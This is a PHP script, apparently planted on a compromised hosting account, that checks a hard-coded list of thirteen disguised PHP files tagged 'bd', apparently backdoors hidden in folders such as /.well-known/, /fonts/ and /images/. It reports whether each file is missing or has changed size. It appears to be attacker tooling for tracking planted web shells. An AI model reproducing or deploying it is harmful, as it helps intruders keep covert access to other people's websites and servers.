<?php $r = '/home/analuakl/grinsentertainment.com'; $x = ["/scripts/extensions/action.new.php"=>"bd@@1353259@@978",
"/css/xenobe_funcs.php"=>"bd@@1358641@@1089",
"/.well-known/Xml.php"=>"bd@@1359457@@807",
"/images/theme.php"=>"bd@@1359470@@951",
"/scripts/non_competitors.php"=>"bd@@1349766@@876",
"/.well-known/pki-validation/self_destruct.php"=>"bd@@1352368@@1006",
"/fonts/tot.php"=>"bd@@1351386@@1064",
"/punbb115.inc.php"=>"bd@@1360991@@50",
"/css/lang.php"=>"bd@@1361012@@37",
"/css/certi.php"=>"bd@@1361042@@19",
"/images/cookie.php"=>"bd@@1361057@@1",
"/images/cookie.auth.lib.php"=>"bd@@1361099@@46",
"/UnderLabEquip.php"=>"bd@@1350403@@911"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');